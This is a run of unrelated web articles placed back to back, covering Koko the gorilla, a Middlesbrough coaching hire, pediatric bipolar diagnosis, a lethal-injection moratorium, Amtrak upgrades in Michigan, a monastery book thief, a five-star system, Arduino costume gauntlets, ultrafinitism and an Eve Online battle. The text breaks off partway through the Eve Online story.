He posted another picture of the two soon after , and wrote , “ What I needed was one of these bad ass koko shirts ! ” with a link to purchase a signature Koko shirt .
Koko was equally excited to meet the music icon , as the foundation explained in a post on their website .
“ One of Koko 's favorite musicians , Flea from the Red Hot Chili Peppers came to visit , ” the foundation said . “ Koko was thrilled by the mellow sounds and a jamming session followed with Koko strumming on Flea 's base ! ”
And this does n't appear to be the last meeting between the two new pals .
“ Watch for more news on future collaborations between the two , ” the foundation wrote .
Get the biggest Middlesbrough FC stories by email Subscribe Thank you for subscribing See our privacy notice Could not subscribe , try again later Invalid Email
Aitor Karanka is set to bring in former Real Madrid team-mate Ivan Perez Munoz as part of a back-room reshuffle .
Perez announced to the Spanish press yesterday that he was to be an “ assistant ” to the Boro boss next term causing some confusion as to his role and the position and pecking order of existing matchday dug-out staff .
But the Gazette understands he will take up a purely back-room brief .
It is believed he will be Karanka 's tactical analyst , poring over Prozone stats of team performance data and preparing reports on upcoming opposition .
Perez , 38 , will support Karanka and his assistant head coach Craig Hignett , goalkeeper coach Leo Percovich and fitness specialist Carlos Cachada .
He will replace Karanka 's former laptop man Javier Egido who left the club over the summer .
Egido had previously worked with the Spanish Football Federation in the youth set-up as their emerging stars swept all before them , winning the European U21 Championships in Denmark in 2011 and Israel in 2013 plus the U19 Championship in Estonia in 2012 .
Perez is expected to be confirmed in his new role next week when the squad and staff reassemble at Rockliffe for pre-season .
His career over-lapped with Karanka for a brief spell at Real and he also had stints at Real Betis and Deportivo La Coruna , where he won La Liga title in 1999-2000 .
As a striker he represented his country at every youth level and scored the winner in the 1998 UEFA European Under-21 Championship final against Greece .
Perez told the Spanish media he was delighted to be given a chance to work with Karanka .
He said : “ I 'm going to England to work with Aitor Karanka at Middlesbrough .
“ The team is in the second division and our goal is to get promotion , but we know how hard it is to move up in competitions in English football .
“ I thank Aitor for giving me this opportunity , which I will work with with the utmost enthusiasm and commitment . ”
Ross Greene 's parenting book The Explosive Child begins with a particularly vivid example of inflexible behavior . One morning , 11-year-old Jennifer finds six waffles in her family 's freezer and decides to toast three for breakfast and save the rest for another day . When her 5-year-old brother enters the kitchen and also wants waffles , Jennifer refuses to relinquish the ones left in the freezer and flies into a screaming rage . Their mother is unable to calm her . Jennifer shoves her out of the way , grabs the waffles from the freezer , and stalks off to her room .
Various best-selling advice books give their own labels to children like Jennifer . Rex Forehand and Nicholas Long go over strategies for dealing with tantrum-prone tots in a book called Parenting the Strong-Willed Child . Michael Bradley delivers a less nuanced diagnosis in his book 's title : Yes , Your Teen Is Crazy ! Stanley Turecki called his classic work The Difficult Child , while Perri Klass and Eileen Costello named their book and its subjects Quirky Kids . And psychiatrists have their own set of terms : opposition-defiant disorder , intermittent explosive disorder , conduct disorder , and so on .
About a decade ago , one more label found its way into the diagnostic basket . Some doctors began to point out that episodic outbursts like Jennifer 's waffle meltdown reminded them of the periodic highs and lows of manic depression , now known as bipolar disorder . A psychiatrist named Demitri Papolos and his wife , Janice , published a book called The Bipolar Child in 1999 , the same year that a group of parents who had met on the increasingly-popular “ BPParents listserv ” formed the Child and Adolescent Bipolar Foundation . Pretty soon , many easily frustrated and chronically inflexible children were receiving a label previously reserved for adults . From 1994 to 2002 , the number of children with the diagnosis increased 40-fold .
With pediatric bipolar on the rise , the mainstream research establishment decided to investigate . In 2000 , the National Institutes of Mental Health director Steven Hyman ( now Harvard University 's provost ) convened a “ roundtable ” of 19 psychiatrists to determine whether the use of “ bipolar disorder ” for young children was appropriate . The group opined that the disorder exists in children but offered no practical advice on how to diagnose or treat it .
This vague but ominous report encouraged a mini-industry in ways to identify the condition . “ Life with your child is chaotic , ” begins the Harvard psychiatrist Janet Wozniak in her 2008 book , Is Your Child Bipolar ? “ A simple request might trigger a violent outburst , like the time she heaved a rock through a window when you asked her to set the table for supper , ” she explains , describing the first of many cases in which the answer to her titular question is yes . The Juvenile Bipolar Research Foundation provides a 65-item online test with questions like , is your child “ very intuitive and/or very creative “ ? Is he “ intolerant of delays “ ? According to the survey , these characteristics could suggest bipolar disorder . ( Or it could be “ temper dysregulation disorder with dysphoria , ” yet another label that might soon be added to the list , suggesting a sort of bipolar lite . )
All this has led to even more diagnoses , a putative epidemic of bipolar among the nation 's children , and a corresponding increase in the pediatric use of antipsychotics , mood stabilizers , and other drugs often used to treat bipolar adults . More than 8,000 children in Massachusetts are prescribed antipsychotic medications like Zyprexa , for example , and the figure does n't include stimulant drugs like Ritalin or Adderall . That 's worrisome since , according to a British government review , the evidence behind drug treatment for the condition in kids is “ extremely limited , ” and several drugs cause major weight gain ( roughly 20 pounds in two months on average ) , hormone problems , and other side effects .
But criticizing widespread proliferation and drug treatment of pediatric bipolar disorder misses the important underlying problem . Normal families do n't seek out stigmatizing labels and give their kids scary drugs for the hell of it . They do these things because they are at wit 's end . Kids like Jennifer who violently melt down over the allocation of waffles have a problem that 's every bit as disabling and damaging to families as a heart defect or blood disorder . A serious diagnosis like “ bipolar ” validates their extraordinary pain in a way that “ difficult ” or “ strong-willed ” or “ quirky ” just does n't . Bipolar disorder is the big tent that brings people together—and allows some to access expert help .
In her recent book We 've Got Issues , Judith Warner explains how we reached this desperate situation in child psychiatry . On the one hand , she argues , science has made solid advances in treating attention problems , dyslexia , autism , and many behavior problems in children . And yet the mental health system is so fragmented , variable in quality , and frankly unfair to those without money that “ there are virtually no guidelines , no gatekeepers—other than the insurance companies , who essentially create protocols for care according to what they will pay for . ”
Insurers stepped in as gatekeepers because access to psychiatrists had to be limited . Why ? For every 11,000 American children—of whom at least 1,000 to 2,000develop a mental health disorder—we have only a single pediatric psychiatrist . There simply are n't enough doctors around to provide the key treatment for explosive behavior : face-to-face time for cognitive and behavioral therapy . Just getting an appointment with a good child psychiatric expert in many parts of the country can take six to eight months .
To get attention from the dysfunctional and overburdened mental health care system , some embarked on an arms race for more dramatic-sounding diagnoses . ( Many insurers , for example , wo n't cover old-fashioned diagnoses like “ conduct disorder , ” but will cover the more serious-sounding bipolar disorder . ) In addition , there was a strong incentive to expand drug therapy because giving pills is less labor-intensive than cognitive and behavioral therapy . The perverse result : Kids get more and more disturbing labels and medications .
In June , the American Academy of Pediatrics suggested various ways to improve mental health care for kids , such as increasing the number of child psychiatrists and constructing a more comprehensive care system . How might the landscape look if parents were n't forced into labeling kids as bipolar , and instead those kids were treated by competent , accessible therapists with the necessary time and compensation to deliver high quality care ?
Ross Greene , the author of The Explosive Child , outlines one sensible model . He shies away from labels and instead focuses on what he calls “ lagging skills. ” Outbursts , he argues , arise from developmental delays in three areas : flexibility , frustration tolerance , and problem-solving . “ Kids , ” he told me , “ do well if they can. ” He spends a lot of time weaning his patients off multiple medications—some are taking almost a dozen of them when they show up in his office—and teaches them behavioral strategies instead . ( Every now and then , he does recommend medications but only for very specific issues . )
Several child psychiatrists with whom I spoke endorsed variations of this theme : Much of the debate around bipolar disorder in kids is fixated on quixotic attempts to shoehorn complex behaviors into neat labels instead of studying and treating the various complex symptoms themselves , like inflexibility , irritability , and anxiety . We now have great behavioral tools for relieving those symptoms . But so long as the right resources are only deployed for those children who can score a label like “ bipolar disorder , ” we 're doomed to an endless cycle of coming up with new names for old problems .
Like Slate on Facebook . Follow us on Twitter .
America 's execution chambers fell idle yesterday after the supreme court made it clear it will allow no more prisoners to be put to death until it reviews the legality of lethal injection .
Death penalty campaigners yesterday said they expected the informal moratorium to last at least until next summer when the supreme court is expected to issue its ruling .
The moratorium follows a decision by the supreme court on Tuesday night to block the execution of a Mississippi inmate minutes before he was to be put to death . Earl Wesley Berry , who has been on death row for 19 years for the murder of a woman , had been served his last supper and was 15 minutes away from execution when the court intervened .
The order for a delay marked the third time in just over a month that the supreme court has overruled state courts and the US court of appeals to block an execution .
Death penalty campaigners yesterday called the successive rulings a powerful sign that the supreme court wanted to put executions on hold while it considers a challenge to the way executions are conducted in America brought on behalf of a prisoner in Kentucky .
`` This is the clearest indication so far from the US supreme court that all lethal injections and probably all executions are going to be held up , '' said Richard Dieter , director of the Death Penalty Information Centre . `` Their actions certainly confirm that and most people are getting the message . ''
Only two of the supreme court judges -the conservatives Antonin Scalia and Samuel Alito - dissented from the opinion .
Mr Dieter said the significance of Tuesday night 's ruling was further underlined by the readiness of the supreme court to overrule state courts and block executions in Mississippi , Virginia and Texas since the announcement in late September of its review of lethal injection methods .
`` This is the US supreme court reversing every other court below them and saying you do n't have it right , '' Mr Dieter said .
Mr Berry 's case had been weaker than the earlier inmates ' because his lawyers had not previously challenged the administration of the drugs in lethal injection .
Only one prisoner has been executed since the court agreed to hear the appeal from the Kentucky prisoner arguing that lethal injection is unconstitutional . That execution , in Texas , went ahead when a state judge refused to keep her court open past 5pm to hear an appeal .
Lethal injection is used in all but one of the 37 states that currently impose the death penalty .
In the Kentucky case , lawyers argue that the cocktail of three drugs used to numb , immobilise , and eventually kill the prisoner does not constitute a painless death . Inexperienced medical technicians have also botched executions , at times inflicting horrific injuries on the condemned .
The supreme court is expected to hear arguments in January . Death penalty campaigners hope the case will clarify what has become a highly confusing area of law . While there is no broad swing of public or legal opinion against the death penalty in America , concern about the administration of lethal injections has led California , Illinois , Florida and other states to suspend executions . Such concerns have reduced executions to 42 this year , one of the lowest levels in more than a decade .
Once Upon a Time has wrapped for season 3 . Time to look back on one of the best parts of the last three years .
[ hypableGallery id=1694 ]
Regina , A.K.A . The Evil Queen , is absolutely a larger-than-life character played by the multi-talented Lana Parilla . To go along with Regina 's over-the-top personality , each year has had some equally over-the-top hairstyles .
Regina has not only been the Queen of The Enchanted Forest , but also the queen of updos , extensions , and even feathers . In commenting on her hair to TV Guide she said , “ No one 's hair has caught on fire yet , but Ginny [ Goodwin ] and I were worried when our heads bumped into the torches and we were almost charred . ”
Every time the Evil Queen makes an entrance it 's a big deal . She either comes barreling down a road in her carriage , or she enters a room flanked by minions ready to do her bidding . The outfits are always memorable with lots of cutting edge jewelry and tunics mixed with leather . She may be an Evil Queen , but she 's a fairly modern looking one .
Only as the uptight mayor of Storybrooke has Regina 's hair and dress ever been subtle . The only thing remotely wild about her hair in Storybrooke is the occasional windblown look when she comes in from outdoors . In Storybrooke , she usually rocks a soccer-mom-meets-news-anchor bob . Her wardrobe is much the same . Emma describes her signature Storybrooke look as “ sensible pantsuits . ”
One thing is sure , next season will definitely feature more Enchanted Forest looks as they flash back to the past .
Which is your favorite Regina look ?
From the Detroit Free Press :
Is that a light at the end of the tunnel ? Not yet .
Though Michigan was awarded $ 403.2 million in federal dollars this year for improvements to its heavily traveled Wolverine lines between Pontiac and Chicago , it could be a while before travelers get speedy , reliable Amtrak service .
Construction and ongoing delays are likely to start in May or June and continue for three or four years — with most major work done on the 135-mile section of track between Dearborn and Kalamazoo .
“ There wo n't be construction everywhere all at one time . It will be broken into manageable pieces , ” said Timothy Hoeffner , administrator of the Michigan Department of Transportation 's office of rail . Still , the project to fix the tracks , cross ties , grades and crossings will cause more disruption on a line already known for its slowness .
By 2015-16 , Amtrak expects to have new locomotives , new cars , smoother tracks , better signaling and — state officials hope — on-time service on the Wolverine . That 's great news for the rough half-million people who ride it each year .
“ Like any construction project , there will be some inconveniences , ” said Amtrak spokesman Marc Magliari . “ We will work to make it worth it in the end . ”
Slow , rickety trains are relics of yesterday
ABOARD AMTRAK , west of Ann Arbor — The train is so jerky , I have to hold onto the wall on the way to the café car . It 's a miracle the attendant can pour coffee without it splashing across the room . I look out the window and see that on a road parallel to the rails , a silver Honda Civic is driving faster than the train is moving .
Compared with trains in Europe , Amtrak service on the Wolverine route between Pontiac and Chicago is a relic .
That is both good and bad .
The trains themselves are big , clunky and old . The ride is slow and full of mystery stops . On the other hand , impersonal , fast trains in Europe do not have kindly conductors helping you down the stairs with their yellow stools or stopping by to remind you , “ Now , the next stop is yours ; do n't forget . ”
But there is a limit to the appeal of old-fashioned train travel . No Wi-Fi . Run-down cars . Unreliable toilets . And woefully slow service .
This year , Michigan landed $ 403.2 million in federal funds to finally buy , repair and upgrade sections of the system and build several new stations with the hopes of faster , on-time service .
Upgrades come just in time . Ridership keeps rising on the Wolverine Line . In all , 503,290 passengers rode in the 2011 fiscal year that ended in September — a 4.9 % rise over last year . And during the five-day Thanksgiving weekend , ridership on Michigan 's three train lines ( Wolverine , Blue Water and Pere Marquette ) hit 16,767 riders .
Where to now ?
Although the aim is to have trains that can go 110 m.p.h. , the realistic near-term goal on the Wolverine Line is to eliminate mystery stops because of traffic from freight trains and poor track conditions .
“ It 's not how fast you go , it 's how little you go slow , ” said Timothy Hoeffner , administrator of the Michigan Department of Transportation office of rail . “ We need to take the mystery out of the trip . You need to know when you are going to leave and more importantly , you need to know when you are going to arrive . ”
That would please current Amtrak customers , who 've become used to arbitrary timetables .
“ I would definitely take the train if it were faster , but it 's not a must , as I do plan to take the train into Chicago again even if the service does n't get any faster , ” said Valerie Wilson of Battle Creek , 53 , who often takes Amtrak to Chicago for business . “ Getting on the train is much simpler than getting on a plane . ”
Lauren Lawler 18 , of Troy just started at Western Michigan University in Kalamazoo . So far , she has taken the train home twice . The prospect of even a slight improvement in Amtrak travel times appeals to her .
“ That would be sweet , ” she said . “ But I love taking the train . It 's my favorite . Even if I could drive , I would choose the train . ”
Patience , please
Before things get better , they may get worse . For three or four years , disruptions will occur on the line , especially on the 135-mile section of track between Dearborn and Kalamazoo . Michigan is buying the track from freight company Norfolk-Southern for $ 140 million . The purchase should close in April . After that , work begins .
“ In some cases , the quickest way to get some of the work done is let the construction crews take over the railroad for days at a time , ” said Marc Magliari , Amtrak spokesman . “ I 'm not sure if that is going to happen in Michigan . We 'll certainly ask for passenger patience . ”
Even now , patience is a quality Amtrak passengers know well .
The day I ride west from Detroit on Amtrak 351 , we arrive just 12 minutes late into Kalamazoo . Kalamazoo has one of the loveliest train stations in Michigan , with rich oak walls and a spacious waiting room . That is lucky , because I have to wait around .
The Amtrak 350 eastbound train headed back to Detroit does not pull in until 11:35 a.m. , 35 minutes late coming from Chicago . At noon , it mysteriously stops for seven minutes near Battle Creek . Near Albion , it slows for no apparent reason to barely moving , crawling past fallow fields .
At 1:05 p.m. , there 's a different type of delay . A westbound Amtrak train has arrived in the Jackson station , so we have to sit on the track and wait 20 minutes before we can pull in from the other direction . After that , the train chugs slowly east .
Finally at 2:57 p.m. , it reaches Detroit , 55 minutes late .
And that 's without construction . What happens next year ?
“ We will work closely with Amtrak to minimize the disruption . With that said , you ca n't always do the work outside the window when the trains are running . There could be a chance that schedules could be adjusted , or we may have to use alternative transportation , ” Hoeffner said . “ Some of the work is rebuilding the grade crossings , replacing some rails , replacing wooden cross ties , some of which are 20 years old . We will add stone ballast and smooth out the alignment . ”
Reason to be happy
It really is a happy problem , this requirement to spend $ 403.2 million of federal money on rail in our state . It breaks down to $ 150 million allocated for the Dearborn-Kalamazoo track , $ 196.5 million to prepare the route for 110-m.p.h . service , $ 3.2 million for a corridor environmental study , $ 9.4 million for a west Detroit track project and $ 44.1 million for new stations .
Alone among all grant recipients , the City of Troy may refuse the money for a new station ; its new mayor and some on City Council oppose the long-awaited project . In addition to the federal money , state and local governments have appropriated $ 47.9 million more to complete all the projects . Improvements to rails , ties , fiber-optic lines for train-control systems and the reconstruction of 180 highway-grade crossings , should help to cut 30 minutes of travel time off the route .
The goal is to cut the Detroit-Chicago travel time to four hours within a few years .
So patience . Patience . Just a little more patience .
“ The end result will be more and better travel choices for people in Michigan , ” Magliari said . “ It is inherently a much more civilized mode of transportation . ”
– Ellen Creager , Detroit Free Press Travel Writer
Source : http : //www.freep.com/article/20111206/FEATURES07/112060385/Fast-trains-to-Chicago-coming-in-3-4-years
Between August 2000 and May 2002 , more than 1,100 ancient books disappeared from the French monastery of Mont Saint-Odile . There was no sign of forced entry ; the monks changed the locks and reinforced the library door with steel , but the books continued to vanish . The thief even left a rose , taunting them .
Finally police installed a video camera and caught Stanislas Gosse , a Strasbourg engineering teacher , entering the darkened library through a cupboard . He confessed that he had discovered a lost map in public archives that revealed the secret entrance — he climbed the exterior walls of the monastery , entered the attic , descended a narrow stairway , and operated a hidden mechanism to open the back of the cupboard . He then browsed the library by candlelight . Apparently the passage had been used to spy on monks in medieval times , when the library had served as the monastery 's common room .
Gosse was convicted of “ burglary by ruse and escalade , ” fined , and given a suspended sentence . “ I 'm afraid my burning passion overrode my conscience , ” he said . “ It may appear selfish , but I felt the books had been abandoned . They were covered with dust and pigeon droppings , and I felt no one consulted them anymore . ”
“ There was also the thrill of adventure–I was very scared of being found out . ”
© Provided by Vox.com
Scientists have discovered an absolutely bizarre star system about 250 light years away , in the constellation Ursa Major .
The system ( officially known as 1SWASP J093010.78+533859.5 ) features five stars that are all gravitationally bound together . Two orbit each other in what 's called a contact eclipsing binary , meaning they 're so close together that they actually share an atmosphere , with gases flowing between them .
Another two stars also orbit each other , but at a much greater distance — about 1.8 million miles , which is more than twice the diameter of the sun . Another star hangs out near that pair , but does n't appear to orbit them .
© Provided by Vox.com
Systems that include five stars gravitationally bound together are rare , though not unprecedented ( astronomers have actually found systems that include as many as six stars ) . But this is the first one ever found that includes multiple pairs of stars orbiting each other .
The discoverers of the strange system — a team of astronomers from Open University in the UK and elsewhere — presented all these discoveries in a new paper published today in the journal Astronomy & Astrophysics . Thanks to George Dvorsky at io9 for bringing it to our attention .
How astronomers study stars 250 light-years away
© Provided by Vox.com
From a single telescope on Earth , all these stars would basically look like a single blob of light , as in the photo above . So to discern the behavior of the stars within the blob — and figure out exactly how many there are — astronomers have to do a bit more analysis .
In this case , they used a series of telescopes in the Canary Islands and South Africa to track exactly how much light was coming from the blob over time . If two stars orbit each other such that one occasionally eclipses the other — blocking it from our view — it 'll cause the total amount of light coming from a system to dip regularly . ( This is very similar to a common method astronomers use to find exoplanets . )
© Provided by Vox.com
Using this method , the astronomers initially calculated that the blob of light was actually two stars orbiting each other . Eventually , however , they discovered that the data included a second , distinct dip in the amount of light coming to us — indicating a second pair of stars orbiting each other . Finally , they calculated that a fifth star is also present , though it does n't cross in front of any of the others , and so it does n't cause another dip .
The astronomers say it 's possible this bizarre system could be home to a host of planets orbiting one or multiple stars . They believe the stars may have originally formed from a single disk of gas , which was later broken into distinct clumps — and by further studying the system and its formation , they may learn more about the dynamics of star creation in general .
Zoe Romano —
We 've been amazed by the great projects coming up the week before Halloween on Twitter and Gplus community and still being submitted to our blog .
Leah Libresco published an Instructables about a pair of interactive gauntlets made with Arduino Lilypad :
This Halloween , I decided to be Alina Starkov from the Grisha Trilogy by Leigh Bardugo . In the books , she 's the one and only Sun Summoner , doing magic with light and heat . Since those powers were beyond me , I put together a set of Arduino-controlled gauntlets instead , that would light up on gesture commands and slip under my sleeves . [ This set up , with a few tweaks , would probably serve you well for Iron Man , too ] Instead of using a single position value from the accelerometer to turn the LEDs on and off , I picked two different triggers , so that it would be easy to * choose * whether I wanted my hands illuminated when they were straight out in front of me ( a necessity , since I plan to host a party in these ! )
Full construction and code are available at this link , below you can see the project in action !
In the philosophy of mathematics , ultrafinitism ( also known as ultraintuitionism , [ 1 ] strict formalism , [ 2 ] strict finitism , [ 2 ] actualism , [ 1 ] predicativism , [ 2 ] [ 3 ] and strong finitism ) [ 2 ] is a form of finitism . There are various philosophies of mathematics that are called ultrafinitism . A major identifying property common among most of these philosophies is their objections to totality of number theoretic functions like exponentiation over natural numbers .
Main ideas [ edit ]
Like other finitists , ultrafinitists deny the existence of the infinite set N of natural numbers .
In addition , some ultrafinitists are concerned with acceptance of objects in mathematics that no one can construct in practice because of physical restrictions in constructing large finite mathematical objects . Thus some ultrafinitists will deny or refrain from accepting the existence of large numbers , for example , the floor of the first Skewes 's number , which is a huge number defined using the exponential function as exp ( exp ( exp ( 79 ) ) ) , or
e e e 79 . { \displaystyle e^ { e^ { e^ { 79 } } } . }
The reason is that nobody has yet calculated what natural number is the floor of this real number , and it may not even be physically possible to do so . Similarly , 2 ↑ ↑ ↑ 6 { \displaystyle 2\uparrow \uparrow \uparrow 6 } ( in Knuth 's up-arrow notation ) would be considered only a formal expression which does not correspond to a natural number . The brand of ultrafinitism concerned with physical realizability of mathematics is often called actualism .
Edward Nelson criticized the classical conception of natural numbers because of the circularity of its definition . In classical mathematics the natural numbers are defined as 0 and numbers obtained by the iterative applications of the successor function to 0 . But the concept of natural number is already assumed for the iteration . In other words , to obtain a number like 2 ↑ ↑ ↑ 6 { \displaystyle 2\uparrow \uparrow \uparrow 6 } one needs to perform the successor function iteratively , in fact exactly 2 ↑ ↑ ↑ 6 { \displaystyle 2\uparrow \uparrow \uparrow 6 } times to 0 .
Some versions of ultrafinitism are forms of constructivism , but most constructivists view the philosophy as unworkably extreme . The logical foundation of ultrafinitism is unclear ; in his comprehensive survey Constructivism in Mathematics ( 1988 ) , the constructive logician A. S. Troelstra dismissed it by saying `` no satisfactory development exists at present . '' This was not so much a philosophical objection as it was an admission that , in a rigorous work of mathematical logic , there was simply nothing precise enough to include .
People associated with ultrafinitism [ edit ]
Serious work on ultrafinitism has been led , since 1959 , by Alexander Esenin-Volpin , who in 1961 sketched a program for proving the consistency of Zermelo–Fraenkel set theory in ultrafinite mathematics . Other mathematicians who have worked in the topic include Doron Zeilberger , Edward Nelson , Rohit Jivanlal Parikh , and Jean Paul Van Bendegem . The philosophy is also sometimes associated with the beliefs of Ludwig Wittgenstein , Robin Gandy , Petr Vopenka , and J. Hjelmslev .
Shaughan Lavine has developed a form of set-theoretical ultra-finitism that is consistent with classical mathematics . [ 4 ] Lavine has shown that the basic principles of arithmetic such as `` there is no largest natural number '' can be upheld , as Lavine allows for the inclusion of `` indefinitely large '' numbers . [ 4 ]
Computational complexity theory based restrictions [ edit ]
Other considerations of the possibility of avoiding unwieldy large numbers can be based on computational complexity theory , as in Andras Kornai 's work on explicit finitism ( which does not deny the existence of large numbers ) [ 5 ] and Vladimir Sazonov 's notion of feasible number .
There has also been considerable formal development on versions of ultrafinitism that are based on complexity theory , like Samuel Buss 's Bounded Arithmetic theories , which capture mathematics associated with various complexity classes like P and PSPACE . Buss 's work can be considered the continuation of Edward Nelson 's work on predicative arithmetic as bounded arithmetic theories like S12 are interpretable in Raphael Robinson 's theory Q and therefore are predicative in Nelson 's sense . The power of these theories for developing mathematics is studied in Bounded reverse mathematics as can be found in the works of Stephen A. Cook and Phuong The Nguyen . However these researches are not philosophies of mathematics but rather the study of restricted forms of reasoning similar to Reverse Mathematics .
See also [ edit ]
Notes [ edit ]
References [ edit ]
The Battle of B-R5RB was the largest and bloodiest in the history of warfare . More than 20 million soldiers were killed and more than 600 warships—some of them kilometers long and capable of destroying lesser vessels with a single shot—destroyed in a battle that raged for 22 hours .
At issue was a distant space station , a small but vital staging area that may be a turning point in a war that has since October pitted two massive alliances in a fight for galactic supremacy .
This battle occurred within the virtual world of the popular roleplaying game Eve Online , yet it required the careful planning , ruthless determination and good fortune of , say , the invasion of Normandy .
That so epic a fight could happen in a digital realm underscores how engaging online gaming can be . Players find the virtual realm of a game like Eve no less fascinating than real life , and they often forge lasting friendships in a gaming experience unlike any other . Though it was just a game , the 7,548 people who fought the Battle of B-R could not have taken it any more seriously—and not simply because they lost virtual ships worth more than $ 300,000 in real-world money fighting it .
And it all started when someone forgot to pay the rent on a space station .
Align or Die ————
Bryan Murph could n't sleep . It was 4 in the morning on January 27 , and food poisoning was kicking his ass . With little else to do between frequent sprints to the bathroom , Murph logged into Eve Online , which is a bit like World of Warcraft in space .
The game , released in 2003 , puts you in a spacecraft and leaves you to find your place among the stars . Some players choose the life of an asteroid miner , infusing the economy with vital shipbuilding materials . Others become smugglers . Still others master the game 's complex economy . Politicians and military strategists advance through cunning or force . Whatever your interest , there 's a place for you in Eve Online .
Eve differs from other roleplaying games in that players do n't advance by completing missions to amass experience and skills . Any player can , with training ( which comes slowly , in real time ) pilot any ship , from the smallest frigate to the mightiest warship . They are limited only by what they can attain through work , force , diplomacy or subterfuge .
__Monetary Matters__Eve players pay a monthly fee , but unlike most online games , that 30 days of game time can be converted into an in-game item called a pilot 's license extension , or PLEX . These can be redeemed for playing time , used to buy in-game services , or , say , finance construction of a Titan .
As with any in-game item , PLEX can be bought , sold , lost or destroyed . You ca n't exchange PLEX for cash , but because they can be purchased with cash , a rough exchange rate exists .
Currently , $ 15 to $ 20 buys one PLEX , which can be sold for about 625 million ISK , making $ 1 worth about 35 million ISK . That 's how it 's possible to lose digital assets worth more than $ 300,000 in the real world .
Murph , a 24-year-old network engineer from Savannah , Georgia , has been playing Eve since 2006 . Known within the game as Lazarus Telraven , he is among three fleet commanders for Clusterfuck Coalition , the largest organization in Eve .
A fleet commander controls up to 255 ships—that is , players . He decides where they are deployed , what armaments they carry and which objectives they fulfill . Murph and his colleagues—known in-game as Mister Vee and Vily—comprise the military command of Clusterfuck Coalition . They assess and respond to threats , plan and execute campaigns and generally kick ass .
It 's a big job . Eve Online is notorious for its player-driven , laissez-faire approach to economics , politics , and warfare . The universe of New Eden is divided into three security classifications . In core “ high-sec ” areas , unauthorized or unprovoked hostility brings swift retribution . In the surrounding “ low-sec ” systems , hostile actions like an unprovoked attack carry some penalty , but you 're less likely to find yourself staring down a starship intent on making an example of you .
Everything else is `` null-sec. ” Anything goes . Blatant aggression , piracy , theft—you name it , and someone 's trying to get away with it . Of New Eden 's 5,431 known galaxies , 3,524 are null-sec zones . Add in some 2,498 uncharted wormhole systems and there 's a lot of room for making trouble . The only way to survive is to band together in corporations—what most MMO players would recognize as a guild . There is no end goal to Eve—no way to `` win '' —and each of the game 's half-million or so players is left to choose their own objective . No matter the path they follow , they ca n't go it alone .
This requires political savvy . Corporations form alliances , and alliances align in coalitions , which control most null-sec areas . There are six major coalitions ; Clusterfuck Coalition is the largest at 36,432 members . It 's followed by N3 , with 23,298 members . These coalitions control vast swaths of New Eden , but their grasp on any one system is always tenuous as coalitions shift .
Such a shift occurred about a year ago , when a coalition known as Pandemic Legion joined N3 in a bid to force an alliance of mostly Russian players called SOLAR from its territory . This new super-coalition , dubbed N3/PL , wanted a remote stretch of New Eden called the Dronelands because it 's a great place to carry out the long and arduous process of building New Eden 's most fearsome warships .
Most battles in Eve take place at the sub-capital level , using Battleships roughly akin in size and power to the Battlestar Galactica . But when hostilities escalate , Capital and Super Capital ships enter the fray . These massive war machines ( think Executor-class Super Star Destroyer ) can take weeks or even months to build , and carry enough firepower—namely the Titan 's Doomsday cannon—to obliterate lesser vessels in a single blast .
Clusterfuck Coalition watched this unfolds from the sidelines until N3/PL joined TEST Alliance Please Ignore ( never let it be said Eve players lack a sense of humor ) in a minor war against Clusterfuck . This was a hassle Clusterfuck did not need , so when SOLAR rallied its Russian allies to war over the Dronelands in October , it gladly seized the opportunity for payback .
The Halloween War had begun .
Click image for high-resolution . Screenshot : th3l33k via Reddit
Locking the Enemy Out of Its Own Space Station ———————————————-
It soon became a war of attrition . N3/PL was a vastly smaller force , but dominated many battles by bringing bigger guns to each fight . Clusterfuck Coalition could n't match the firepower and was running out of options .
Until January 27 .
Each star system in Eve is given a random alphanumeric identifier . B-R5RB contains a space station in which Pandemic Legion stored warships , munitions and equipment worth hundreds of billions of Interstellar Kredits , the currency of New Eden . Alliances can claim unoccupied corners of the universe simply by planting the flag , as long as they pay a monthly fee of around one billion ISK . With `` sovereignty '' over this part of space , they can be reasonably assured that their assets are safe .
Between sprints to the bathroom , Murph learned Pandemic Legion had somehow lost its sovereignty status in B-R5RB . Capturing a sovereign part of space is akin to attacking a well-defended castle . But if the guy holding the station loses sovereignty , it becomes a relatively simple matter of moving in because the owner is on the curb , the drawbridge is down and the gate is open . It was unthinkable that this could happen . But it had .
Murph had eight hours to act , because that 's how long it takes for Territorial Claim Units—the drones that grant control of a system—to come online . Even if Pandemic Legion realized B-R was vulnerable , it could n't retake the station until its TCUs were online . If Murph destroyed the drones before then , Clusterfuck Coalition could seize the station .
His Russian allies planned to muster at 1400 Eve time ( equivalent to GMT ) . But that would leave just 45 minutes before Pandemic Legion 's TCUs came online , giving it control of the station . Murph made the call to attack earlier . At 1300 hours , he and his allies hit B-R5RB with nearly 300 sub-capital ships and 45 Capital-class Dreadnoughts—a formidable force that quickly gave him the upper hand .
`` We took the station , killed their TCUs , put down our own , and settled in , '' Murph said .
By now , N3/PL was frantically gathering its navy to take back B-R. Murph knew they were coming , and he knew they were n't sure what they 'd find when they arrived . Clusterfuck Coalition has a reputation for avoiding fights between huge ships . This time would be different . Murph made the call : all hands on deck .
N3/PL finally arrived at around 1530 Eve time . The fight was on .
' I Knew It Was Going to Be Bad ' ——————————-
Murph had nearly 1,000 players at his command—three full fleets of 255 ships . His orders were being translated into Russian , French , and other languages . He had sole command , because Mister Vee and Vily were at work .
__The Ships of B-R5RB__The differences between the various classifications of warships in Eve Online are whole orders of magnitude . Here are a few examples :
Sub-Capital
Class : Battleship
Effective Hit Points : ~140,000
Size : ~900 meters
Damage Output : ~350 per second
Production Time : ~3.5 Hours
Cost : ~180 million ISK
Capital
Class : Dreadnought
Effective Hit Points : ~1.4 million
Size : ~3 kilometers
Damage Output : ~3000 per second
Production Time : ~2 weeks
Cost : ~3 billion ISK
Super Capital
Class : Titan
Effective Hit Points : ~45 million
Size : ~18 kilometers
Damage Output : ~5000 per second
Doomsday Cannon Damage : 3 million
Production Time : ~8 weeks
Cost : ~100 billion ISK
He still had the chance to back down . Most of the 400 or so players involved at that point were piloting sub-capital Battleships . His largest ships—some 80 Dreadnoughts , 40 Supercarriers and 30 Titans—were a safe distance away , awaiting the call to battle .
Murph had reason to be wary . Although he was fighting a virtual battle , he was limited by real-world technology . Highly trafficked systems in the Eve universe use servers built to handle vast numbers of players , but remote areas are n't equipped for such a load . Thrusting so many ships into B-R5RB could cause debilitating lag or even crash the node , an annoying problem that cost Murph a devastating loss just a week before .
Murph needed a gut-check . He sent a text message to Mister Vee , calling him to battle . Sorry , Vee replied , you 're on your own . Murph sent one last text .
